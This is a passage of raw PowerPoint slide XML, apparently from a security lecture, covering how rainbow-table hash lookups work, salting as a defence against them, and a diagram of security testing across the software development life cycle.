              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="46A6BD">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:srgbClr>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="282575" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="630238" lvl="1" indent="-273050" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8FD600"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Here is the algorithm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>1. Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>to see if the hash matches any of the final hashes. If so, break out of the loop because you have found the chain that contains its plaintext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>2. If the hash doesn’t match any of the final hashes in the tables, use the reduction function on it to reduce it into another plaintext, and then hash the new plaintext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Go back to step 1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33863421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Rainbow Tables works?(2)</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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="923670"/>
            <a:ext cx="8534400" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218"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58401" y="1383664"/>
            <a:ext cx="8674798" cy="4229943"/>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9777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89045" y="1162197"/>
            <a:ext cx="8305800" cy="1437946"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Salt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> consists of random bits, creating one of the inputs to a hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="EBFFD2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="923670"/>
            <a:ext cx="8534400" cy="477054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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706" y="2590800"/>
            <a:ext cx="8458494" cy="3505200"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="33154"/>
            <a:ext cx="7086600" cy="9144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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rainbow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Salt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6692212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sz="3800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing in the Software Development Life Cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219201"/>
            <a:ext cx="8686800" cy="5486399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Development Life Cycle,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With Security In Mind</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="5538569"/>
            <a:ext cx="7734300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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23900" y="5271869"/>
            <a:ext cx="0" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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458200" y="5271869"/>
            <a:ext cx="0" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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324600" y="5271869"/>
            <a:ext cx="0" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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257800" y="5271869"/>
            <a:ext cx="0" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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429000" y="5271869"/>
            <a:ext cx="0" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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451100" y="5271869"/>
            <a:ext cx="0" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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7000" y="5830669"/>
            <a:ext cx="1600200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Requirements </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>and use cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2006600" y="5969168"/>
            <a:ext cx="889000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>esign</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="5830669"/>
            <a:ext cx="889000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Test plans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="5969168"/>
            <a:ext cx="889000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="5830668"/>
            <a:ext cx="889000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Test results</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="5830669"/>
            <a:ext cx="1219200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Field feedback</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="3969938"/>
            <a:ext cx="800100" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Abuse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3046966"/>
            <a:ext cx="1600200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Security requirements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943850" y="3944536"/>
            <a:ext cx="1028700" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Security breaks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2584450" y="2651370"/>
            <a:ext cx="1390650" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>External review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3562350" y="3972676"/>
            <a:ext cx="1600200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
